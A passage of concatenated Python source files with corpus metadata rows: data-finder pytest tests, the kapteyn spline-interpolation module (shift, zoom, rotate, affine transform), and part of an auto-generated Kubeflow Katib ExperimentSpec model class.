"""Create directory structure and files."""
for filename in filenames or []:
create_file(os.path.join(path, filename))
for symlink in symlinks or []:
link_name = os.path.join(path, symlink['link_name'])
os.symlink(symlink['target'], link_name)
@pytest.mark.parametrize('cfg', CONFIG['get_output_file'])
def test_get_output_file(cfg):
"""Test getting output name for preprocessed files."""
output_file = get_output_file(cfg['variable'], cfg['preproc_dir'])
assert output_file == cfg['output_file']
@pytest.fixture
def root():
"""Root function for tests."""
dirname = tempfile.mkdtemp()
yield os.path.join(dirname, 'output1')
print("Directory structure was:")
tree(dirname)
shutil.rmtree(dirname)
@pytest.mark.parametrize('cfg', CONFIG['get_input_filelist'])
def test_get_input_filelist(root, cfg):
"""Test retrieving input filelist."""
create_tree(root, cfg.get('available_files'),
cfg.get('available_symlinks'))
# Find files
rootpath = {cfg['variable']['project']: [root]}
drs = {cfg['variable']['project']: cfg['drs']}
input_filelist = get_input_filelist(cfg['variable'], rootpath, drs)
# Test result
reference = [os.path.join(root, file) for file in cfg['found_files']]
assert sorted(input_filelist) == sorted(reference)
@pytest.mark.parametrize('cfg', CONFIG['get_input_fx_filelist'])
def test_get_input_fx_filelist(root, cfg):
"""Test retrieving fx filelist."""
create_tree(root, cfg.get('available_files'),
cfg.get('available_symlinks'))
# Find files
rootpath = {cfg['variable']['project']: [root]}
drs = {cfg['variable']['project']: cfg['drs']}
fx_files = get_input_fx_filelist(cfg['variable'], rootpath, drs)
# Test result
reference = {
fx_var: os.path.join(root, filename) if filename else None
for fx_var, filename in cfg['found_files'].items()
}
assert fx_files == reference
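# --- Editor's note: hedged illustration, not part of the original module ---
# Shape of one 'get_output_file' entry in data_finder.yml, inferred from the keys
# read above; every concrete value below is invented for illustration only.
#     get_output_file:
#       - variable: {project: CMIP5, dataset: HadGEM2-ES, short_name: tas}
#         preproc_dir: /preproc
#         output_file: /preproc/CMIP5_HadGEM2-ES_tas.nc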
| tests/integration/test_data_finder.py | 3,425 | Create an empty file.
Create directory structure and files.
Print path.
Root function for tests.
Test retrieving input filelist.
Test retrieving fx filelist.
Test getting output name for preprocessed files.
 Print path, similar to the `tree` command.
Tests for _data_finder.py.
Initialize with standard config developer file Initialize CMOR tables Load test configuration Find files Test result Find files Test result | 422 | en | 0.599473 |
# Copyright (C) 2003-2005 Peter J. Verveer
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import math
import numpy
from . import _ni_support
from kapteyn import _nd_image
def _extend_mode_to_code(mode):
mode = _ni_support._extend_mode_to_code(mode)
return mode
def spline_filter1d(input, order = 3, axis = -1, output = numpy.float64,
output_type = None):
"""Calculates a one-dimensional spline filter along the given axis.
The lines of the array along the given axis are filtered by a
spline filter. The order of the spline must be >= 2 and <= 5.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input,
output_type)
if order in [0, 1]:
output[...] = numpy.array(input)
else:
axis = _ni_support._check_axis(axis, input.ndim)
_nd_image.spline_filter1d(input, order, axis, output)
return return_value
def spline_filter(input, order = 3, output = numpy.float64,
output_type = None):
"""Multi-dimensional spline filter.
Note: The multi-dimensional filter is implemented as a sequence of
one-dimensional spline filters. The intermediate arrays are stored
in the same data type as the output. Therefore, for output types
with a limited precision, the results may be imprecise because
intermediate results may be stored with insufficient precision.
"""
if order < 2 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input,
output_type)
if order not in [0, 1] and input.ndim > 0:
for axis in range(input.ndim):
spline_filter1d(input, order, axis, output = output)
input = output
else:
output[...] = input[...]
return return_value
def geometric_transform(input, mapping, output_shape = None,
output_type = None, output = None, order = 3,
mode = 'constant', cval = 0.0, prefilter = True,
extra_arguments = (), extra_keywords = {}):
"""Apply an arbritrary geometric transform.
The given mapping function is used to find, for each point in the
output, the corresponding coordinates in the input. The value of the
input at those coordinates is determined by spline interpolation of
the requested order.
mapping must be a callable object that accepts a tuple of length
equal to the output array rank and returns the corresponding input
coordinates as a tuple of length equal to the input array
rank. Points outside the boundaries of the input are filled
according to the given mode ('constant', 'nearest', 'reflect' or
'wrap'). The output shape can optionally be given. If not given,
it is equal to the input shape. The parameter prefilter determines
if the input is pre-filtered before interpolation (necessary for
spline interpolation of order > 1). If False it is assumed that
the input is already filtered. The extra_arguments and
extra_keywords arguments can be used to provide extra arguments
and keywords that are passed to the mapping function at each call.
Example
-------
>>> a = arange(12.).reshape((4,3))
>>> def shift_func(output_coordinates):
... return (output_coordinates[0]-0.5, output_coordinates[1]-0.5)
...
>>> print geometric_transform(a,shift_func)
array([[ 0. , 0. , 0. ],
[ 0. , 1.3625, 2.7375],
[ 0. , 4.8125, 6.1875],
[ 0. , 8.2625, 9.6375]])
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
output_type, shape = output_shape)
_nd_image.geometric_transform(filtered, mapping, None, None, None,
output, order, mode, cval, extra_arguments, extra_keywords)
return return_value
def map_coordinates(input, coordinates, output_type = None, output = None,
order = 3, mode = 'constant', cval = 0.0, prefilter = True):
"""
Map the input array to new coordinates by interpolation.
The array of coordinates is used to find, for each point in the output,
the corresponding coordinates in the input. The value of the input at
those coordinates is determined by spline interpolation of the
requested order.
The shape of the output is derived from that of the coordinate
array by dropping the first axis. The values of the array along
the first axis are the coordinates in the input array at which the
output value is found.
Parameters
----------
input : ndarray
The input array
coordinates : array_like
The coordinates at which `input` is evaluated.
output_type : deprecated
Use `output` instead.
output : dtype, optional
If the output has to have a certain type, specify the dtype.
The default behavior is for the output to have the same type
as `input`.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
        `mode='constant'`. Default is 0.0.
prefilter : bool, optional
The parameter prefilter determines if the input is
pre-filtered with `spline_filter`_ before interpolation
(necessary for spline interpolation of order > 1).
If False, it is assumed that the input is already filtered.
Returns
-------
return_value : ndarray
The result of transforming the input. The shape of the
output is derived from that of `coordinates` by dropping
the first axis.
See Also
--------
spline_filter, geometric_transform, scipy.interpolate
Examples
--------
>>> import scipy.ndimage
>>> a = np.arange(12.).reshape((4,3))
>>> print a
array([[ 0., 1., 2.],
[ 3., 4., 5.],
[ 6., 7., 8.],
[ 9., 10., 11.]])
>>> sp.ndimage.map_coordinates(a, [[0.5, 2], [0.5, 1]], order=1)
[ 2. 7.]
Above, the interpolated value of a[0.5, 0.5] gives output[0], while
a[2, 1] is output[1].
>>> inds = np.array([[0.5, 2], [0.5, 4]])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=-33.3)
array([ 2. , -33.3])
>>> sp.ndimage.map_coordinates(a, inds, order=1, mode='nearest')
array([ 2., 8.])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=0, output=bool)
    array([ True, False], dtype=bool)
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
coordinates = numpy.asarray(coordinates)
if numpy.iscomplexobj(coordinates):
raise TypeError('Complex type not supported')
output_shape = coordinates.shape[1:]
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
if coordinates.shape[0] != input.ndim:
raise RuntimeError('invalid shape for coordinate array')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
output_type, shape = output_shape)
_nd_image.geometric_transform(filtered, None, coordinates, None, None,
output, order, mode, cval, None, None)
return return_value
def affine_transform(input, matrix, offset = 0.0, output_shape = None,
output_type = None, output = None, order = 3,
mode = 'constant', cval = 0.0, prefilter = True):
"""Apply an affine transformation.
The given matrix and offset are used to find for each point in the
output the corresponding coordinates in the input by an affine
transformation. The value of the input at those coordinates is
determined by spline interpolation of the requested order. Points
outside the boundaries of the input are filled according to the given
mode. The output shape can optionally be given. If not given it is
equal to the input shape. The parameter prefilter determines if the
input is pre-filtered before interpolation, if False it is assumed
that the input is already filtered.
The matrix must be two-dimensional or can also be given as a
one-dimensional sequence or array. In the latter case, it is
    assumed that the matrix is diagonal. A more efficient algorithm
is then applied that exploits the separability of the problem.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
output_type, shape = output_shape)
matrix = numpy.asarray(matrix, dtype = numpy.float64)
if matrix.ndim not in [1, 2] or matrix.shape[0] < 1:
raise RuntimeError('no proper affine matrix provided')
if matrix.shape[0] != input.ndim:
raise RuntimeError('affine matrix has wrong number of rows')
if matrix.ndim == 2 and matrix.shape[1] != output.ndim:
raise RuntimeError('affine matrix has wrong number of columns')
if not matrix.flags.contiguous:
matrix = matrix.copy()
offset = _ni_support._normalize_sequence(offset, input.ndim)
offset = numpy.asarray(offset, dtype = numpy.float64)
if offset.ndim != 1 or offset.shape[0] < 1:
raise RuntimeError('no proper offset provided')
if not offset.flags.contiguous:
offset = offset.copy()
if matrix.ndim == 1:
_nd_image.zoom_shift(filtered, matrix, offset, output, order,
mode, cval)
else:
_nd_image.geometric_transform(filtered, None, None, matrix, offset,
output, order, mode, cval, None, None)
return return_value
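# --- Illustrative sketch (added; not part of the original module) of the two
# matrix forms accepted by affine_transform: a full 2-D matrix, and a 1-D
# sequence that is interpreted as the diagonal and triggers the separable
# zoom_shift code path.  The numbers are arbitrary.
def _example_affine_transform_matrix_forms():
    a = numpy.arange(12.0).reshape((4, 3))
    full = affine_transform(a, [[0.5, 0.0], [0.0, 0.5]], offset=(1.0, 1.0))
    diagonal = affine_transform(a, [0.5, 0.5], offset=(1.0, 1.0))
    return full, diagonal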
def shift(input, shift, output_type = None, output = None, order = 3,
mode = 'constant', cval = 0.0, prefilter = True):
"""Shift an array.
The array is shifted using spline interpolation of the requested
order. Points outside the boundaries of the input are filled according
to the given mode. The parameter prefilter determines if the input is
pre-filtered before interpolation, if False it is assumed that the
input is already filtered.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
output_type)
shift = _ni_support._normalize_sequence(shift, input.ndim)
shift = [-ii for ii in shift]
shift = numpy.asarray(shift, dtype = numpy.float64)
if not shift.flags.contiguous:
shift = shift.copy()
_nd_image.zoom_shift(filtered, None, shift, output, order, mode, cval)
return return_value
def zoom(input, zoom, output_type = None, output = None, order = 3,
mode = 'constant', cval = 0.0, prefilter = True):
"""Zoom an array.
The array is zoomed using spline interpolation of the requested order.
Points outside the boundaries of the input are filled according to the
given mode. The parameter prefilter determines if the input is pre-
filtered before interpolation, if False it is assumed that the input
is already filtered.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
zoom = _ni_support._normalize_sequence(zoom, input.ndim)
output_shape = tuple([int(ii * jj) for ii, jj in zip(input.shape, zoom)])
zoom = (numpy.array(input.shape)-1)/(numpy.array(output_shape,float)-1)
output, return_value = _ni_support._get_output(output, input,
output_type, shape = output_shape)
zoom = numpy.asarray(zoom, dtype = numpy.float64)
zoom = numpy.ascontiguousarray(zoom)
_nd_image.zoom_shift(filtered, zoom, None, output, order, mode, cval)
return return_value
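# --- Illustrative sketch (added; not part of the original module): the output
# shape of zoom is int(input_shape * zoom_factor) per axis, so a factor of 2
# turns a (4, 3) array into an (8, 6) array.
def _example_zoom_output_shape():
    a = numpy.arange(12.0).reshape((4, 3))
    result = zoom(a, 2.0, order=1)
    assert result.shape == (8, 6)
    return result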
def _minmax(coor, minc, maxc):
if coor[0] < minc[0]:
minc[0] = coor[0]
if coor[0] > maxc[0]:
maxc[0] = coor[0]
if coor[1] < minc[1]:
minc[1] = coor[1]
if coor[1] > maxc[1]:
maxc[1] = coor[1]
return minc, maxc
def rotate(input, angle, axes = (1, 0), reshape = True,
output_type = None, output = None, order = 3,
mode = 'constant', cval = 0.0, prefilter = True):
"""Rotate an array.
The array is rotated in the plane defined by the two axes given by the
axes parameter using spline interpolation of the requested order. The
angle is given in degrees. Points outside the boundaries of the input
are filled according to the given mode. If reshape is true, the output
shape is adapted so that the input array is contained completely in
the output. The parameter prefilter determines if the input is pre-
filtered before interpolation, if False it is assumed that the input
is already filtered.
"""
input = numpy.asarray(input)
axes = list(axes)
rank = input.ndim
if axes[0] < 0:
axes[0] += rank
if axes[1] < 0:
axes[1] += rank
    if axes[0] < 0 or axes[1] < 0 or axes[0] >= rank or axes[1] >= rank:
raise RuntimeError('invalid rotation plane specified')
if axes[0] > axes[1]:
axes = axes[1], axes[0]
angle = numpy.pi / 180 * angle
m11 = math.cos(angle)
m12 = math.sin(angle)
m21 = -math.sin(angle)
m22 = math.cos(angle)
matrix = numpy.array([[m11, m12],
[m21, m22]], dtype = numpy.float64)
iy = input.shape[axes[0]]
ix = input.shape[axes[1]]
if reshape:
mtrx = numpy.array([[ m11, -m21],
[-m12, m22]], dtype = numpy.float64)
minc = [0, 0]
maxc = [0, 0]
coor = numpy.dot(mtrx, [0, ix])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, 0])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, ix])
minc, maxc = _minmax(coor, minc, maxc)
oy = int(maxc[0] - minc[0] + 0.5)
ox = int(maxc[1] - minc[1] + 0.5)
else:
oy = input.shape[axes[0]]
ox = input.shape[axes[1]]
offset = numpy.zeros((2,), dtype = numpy.float64)
offset[0] = float(oy) / 2.0 - 0.5
offset[1] = float(ox) / 2.0 - 0.5
offset = numpy.dot(matrix, offset)
tmp = numpy.zeros((2,), dtype = numpy.float64)
tmp[0] = float(iy) / 2.0 - 0.5
tmp[1] = float(ix) / 2.0 - 0.5
offset = tmp - offset
output_shape = list(input.shape)
output_shape[axes[0]] = oy
output_shape[axes[1]] = ox
output_shape = tuple(output_shape)
output, return_value = _ni_support._get_output(output, input,
output_type, shape = output_shape)
if input.ndim <= 2:
affine_transform(input, matrix, offset, output_shape, None, output,
order, mode, cval, prefilter)
else:
coordinates = []
        size = numpy.product(input.shape, axis=0)
        # integer division keeps `size` usable as a range() bound under Python 3
        size //= input.shape[axes[0]]
        size //= input.shape[axes[1]]
for ii in range(input.ndim):
if ii not in axes:
coordinates.append(0)
else:
coordinates.append(slice(None, None, None))
iter_axes = list(range(input.ndim))
iter_axes.reverse()
iter_axes.remove(axes[0])
iter_axes.remove(axes[1])
os = (output_shape[axes[0]], output_shape[axes[1]])
for ii in range(size):
ia = input[tuple(coordinates)]
oa = output[tuple(coordinates)]
affine_transform(ia, matrix, offset, os, None, oa, order, mode,
cval, prefilter)
for jj in iter_axes:
if coordinates[jj] < input.shape[jj] - 1:
coordinates[jj] += 1
break
else:
coordinates[jj] = 0
return return_value
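# --- Illustrative sketch (added; not part of the original module) of the
# reshape flag on rotate: with reshape=True the output grows so the rotated
# input fits completely, with reshape=False the original shape is kept.
def _example_rotate_reshape():
    a = numpy.arange(12.0).reshape((4, 3))
    grown = rotate(a, 45.0, reshape=True, order=1)
    same = rotate(a, 45.0, reshape=False, order=1)
    return grown.shape, same.shape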
| kapteyn/interpolation.py | 20,228 | Apply an affine transformation.
The given matrix and offset are used to find for each point in the
output the corresponding coordinates in the input by an affine
transformation. The value of the input at those coordinates is
determined by spline interpolation of the requested order. Points
outside the boundaries of the input are filled according to the given
mode. The output shape can optionally be given. If not given it is
equal to the input shape. The parameter prefilter determines if the
input is pre-filtered before interpolation, if False it is assumed
that the input is already filtered.
The matrix must be two-dimensional or can also be given as a
one-dimensional sequence or array. In the latter case, it is
    assumed that the matrix is diagonal. A more efficient algorithm
is then applied that exploits the separability of the problem.
    Apply an arbitrary geometric transform.
The given mapping function is used to find, for each point in the
output, the corresponding coordinates in the input. The value of the
input at those coordinates is determined by spline interpolation of
the requested order.
mapping must be a callable object that accepts a tuple of length
equal to the output array rank and returns the corresponding input
coordinates as a tuple of length equal to the input array
rank. Points outside the boundaries of the input are filled
according to the given mode ('constant', 'nearest', 'reflect' or
'wrap'). The output shape can optionally be given. If not given,
it is equal to the input shape. The parameter prefilter determines
if the input is pre-filtered before interpolation (necessary for
spline interpolation of order > 1). If False it is assumed that
the input is already filtered. The extra_arguments and
extra_keywords arguments can be used to provide extra arguments
and keywords that are passed to the mapping function at each call.
Example
-------
>>> a = arange(12.).reshape((4,3))
>>> def shift_func(output_coordinates):
... return (output_coordinates[0]-0.5, output_coordinates[1]-0.5)
...
>>> print geometric_transform(a,shift_func)
array([[ 0. , 0. , 0. ],
[ 0. , 1.3625, 2.7375],
[ 0. , 4.8125, 6.1875],
[ 0. , 8.2625, 9.6375]])
Map the input array to new coordinates by interpolation.
The array of coordinates is used to find, for each point in the output,
the corresponding coordinates in the input. The value of the input at
those coordinates is determined by spline interpolation of the
requested order.
The shape of the output is derived from that of the coordinate
array by dropping the first axis. The values of the array along
the first axis are the coordinates in the input array at which the
output value is found.
Parameters
----------
input : ndarray
The input array
coordinates : array_like
The coordinates at which `input` is evaluated.
output_type : deprecated
Use `output` instead.
output : dtype, optional
If the output has to have a certain type, specify the dtype.
The default behavior is for the output to have the same type
as `input`.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
        `mode='constant'`. Default is 0.0.
prefilter : bool, optional
The parameter prefilter determines if the input is
pre-filtered with `spline_filter`_ before interpolation
(necessary for spline interpolation of order > 1).
If False, it is assumed that the input is already filtered.
Returns
-------
return_value : ndarray
The result of transforming the input. The shape of the
output is derived from that of `coordinates` by dropping
the first axis.
See Also
--------
spline_filter, geometric_transform, scipy.interpolate
Examples
--------
>>> import scipy.ndimage
>>> a = np.arange(12.).reshape((4,3))
>>> print a
array([[ 0., 1., 2.],
[ 3., 4., 5.],
[ 6., 7., 8.],
[ 9., 10., 11.]])
>>> sp.ndimage.map_coordinates(a, [[0.5, 2], [0.5, 1]], order=1)
[ 2. 7.]
Above, the interpolated value of a[0.5, 0.5] gives output[0], while
a[2, 1] is output[1].
>>> inds = np.array([[0.5, 2], [0.5, 4]])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=-33.3)
array([ 2. , -33.3])
>>> sp.ndimage.map_coordinates(a, inds, order=1, mode='nearest')
array([ 2., 8.])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=0, output=bool)
    array([ True, False], dtype=bool)
Rotate an array.
The array is rotated in the plane defined by the two axes given by the
axes parameter using spline interpolation of the requested order. The
angle is given in degrees. Points outside the boundaries of the input
are filled according to the given mode. If reshape is true, the output
shape is adapted so that the input array is contained completely in
the output. The parameter prefilter determines if the input is pre-
filtered before interpolation, if False it is assumed that the input
is already filtered.
Shift an array.
The array is shifted using spline interpolation of the requested
order. Points outside the boundaries of the input are filled according
to the given mode. The parameter prefilter determines if the input is
pre-filtered before interpolation, if False it is assumed that the
input is already filtered.
Multi-dimensional spline filter.
Note: The multi-dimensional filter is implemented as a sequence of
one-dimensional spline filters. The intermediate arrays are stored
in the same data type as the output. Therefore, for output types
with a limited precision, the results may be imprecise because
intermediate results may be stored with insufficient precision.
Calculates a one-dimensional spline filter along the given axis.
The lines of the array along the given axis are filtered by a
spline filter. The order of the spline must be >= 2 and <= 5.
Zoom an array.
The array is zoomed using spline interpolation of the requested order.
Points outside the boundaries of the input are filled according to the
given mode. The parameter prefilter determines if the input is pre-
filtered before interpolation, if False it is assumed that the input
is already filtered.
Copyright (C) 2003-2005 Peter J. Verveer Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | 7,938 | en | 0.769068 |
# coding: utf-8
"""
Katib
Swagger description for Katib # noqa: E501
OpenAPI spec version: v1alpha3-0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from kubeflow.katib.models.v1alpha3_algorithm_spec import V1alpha3AlgorithmSpec # noqa: F401,E501
from kubeflow.katib.models.v1alpha3_metrics_collector_spec import V1alpha3MetricsCollectorSpec # noqa: F401,E501
from kubeflow.katib.models.v1alpha3_nas_config import V1alpha3NasConfig # noqa: F401,E501
from kubeflow.katib.models.v1alpha3_objective_spec import V1alpha3ObjectiveSpec # noqa: F401,E501
from kubeflow.katib.models.v1alpha3_parameter_spec import V1alpha3ParameterSpec # noqa: F401,E501
from kubeflow.katib.models.v1alpha3_trial_template import V1alpha3TrialTemplate # noqa: F401,E501
class V1alpha3ExperimentSpec(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'algorithm': 'V1alpha3AlgorithmSpec',
'max_failed_trial_count': 'int',
'max_trial_count': 'int',
'metrics_collector_spec': 'V1alpha3MetricsCollectorSpec',
'nas_config': 'V1alpha3NasConfig',
'objective': 'V1alpha3ObjectiveSpec',
'parallel_trial_count': 'int',
'parameters': 'list[V1alpha3ParameterSpec]',
'resume_policy': 'str',
'trial_template': 'V1alpha3TrialTemplate'
}
attribute_map = {
'algorithm': 'algorithm',
'max_failed_trial_count': 'maxFailedTrialCount',
'max_trial_count': 'maxTrialCount',
'metrics_collector_spec': 'metricsCollectorSpec',
'nas_config': 'nasConfig',
'objective': 'objective',
'parallel_trial_count': 'parallelTrialCount',
'parameters': 'parameters',
'resume_policy': 'resumePolicy',
'trial_template': 'trialTemplate'
}
def __init__(self, algorithm=None, max_failed_trial_count=None, max_trial_count=None, metrics_collector_spec=None, nas_config=None, objective=None, parallel_trial_count=None, parameters=None, resume_policy=None, trial_template=None): # noqa: E501
"""V1alpha3ExperimentSpec - a model defined in Swagger""" # noqa: E501
self._algorithm = None
self._max_failed_trial_count = None
self._max_trial_count = None
self._metrics_collector_spec = None
self._nas_config = None
self._objective = None
self._parallel_trial_count = None
self._parameters = None
self._resume_policy = None
self._trial_template = None
self.discriminator = None
if algorithm is not None:
self.algorithm = algorithm
if max_failed_trial_count is not None:
self.max_failed_trial_count = max_failed_trial_count
if max_trial_count is not None:
self.max_trial_count = max_trial_count
if metrics_collector_spec is not None:
self.metrics_collector_spec = metrics_collector_spec
if nas_config is not None:
self.nas_config = nas_config
if objective is not None:
self.objective = objective
if parallel_trial_count is not None:
self.parallel_trial_count = parallel_trial_count
if parameters is not None:
self.parameters = parameters
if resume_policy is not None:
self.resume_policy = resume_policy
if trial_template is not None:
self.trial_template = trial_template
@property
def algorithm(self):
"""Gets the algorithm of this V1alpha3ExperimentSpec. # noqa: E501
Describes the suggestion algorithm. # noqa: E501
:return: The algorithm of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3AlgorithmSpec
"""
return self._algorithm
@algorithm.setter
def algorithm(self, algorithm):
"""Sets the algorithm of this V1alpha3ExperimentSpec.
Describes the suggestion algorithm. # noqa: E501
:param algorithm: The algorithm of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3AlgorithmSpec
"""
self._algorithm = algorithm
@property
def max_failed_trial_count(self):
"""Gets the max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
Max failed trials to mark experiment as failed. # noqa: E501
:return: The max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
"""
return self._max_failed_trial_count
@max_failed_trial_count.setter
def max_failed_trial_count(self, max_failed_trial_count):
"""Sets the max_failed_trial_count of this V1alpha3ExperimentSpec.
Max failed trials to mark experiment as failed. # noqa: E501
:param max_failed_trial_count: The max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
"""
self._max_failed_trial_count = max_failed_trial_count
@property
def max_trial_count(self):
"""Gets the max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
Max completed trials to mark experiment as succeeded # noqa: E501
:return: The max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
"""
return self._max_trial_count
@max_trial_count.setter
def max_trial_count(self, max_trial_count):
"""Sets the max_trial_count of this V1alpha3ExperimentSpec.
Max completed trials to mark experiment as succeeded # noqa: E501
:param max_trial_count: The max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
"""
self._max_trial_count = max_trial_count
@property
def metrics_collector_spec(self):
"""Gets the metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
For v1alpha3 we will keep the metrics collector implementation same as v1alpha1. # noqa: E501
:return: The metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3MetricsCollectorSpec
"""
return self._metrics_collector_spec
@metrics_collector_spec.setter
def metrics_collector_spec(self, metrics_collector_spec):
"""Sets the metrics_collector_spec of this V1alpha3ExperimentSpec.
For v1alpha3 we will keep the metrics collector implementation same as v1alpha1. # noqa: E501
:param metrics_collector_spec: The metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3MetricsCollectorSpec
"""
self._metrics_collector_spec = metrics_collector_spec
@property
def nas_config(self):
"""Gets the nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:return: The nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3NasConfig
"""
return self._nas_config
@nas_config.setter
def nas_config(self, nas_config):
"""Sets the nas_config of this V1alpha3ExperimentSpec.
:param nas_config: The nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3NasConfig
"""
self._nas_config = nas_config
@property
def objective(self):
"""Gets the objective of this V1alpha3ExperimentSpec. # noqa: E501
Describes the objective of the experiment. # noqa: E501
:return: The objective of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3ObjectiveSpec
"""
return self._objective
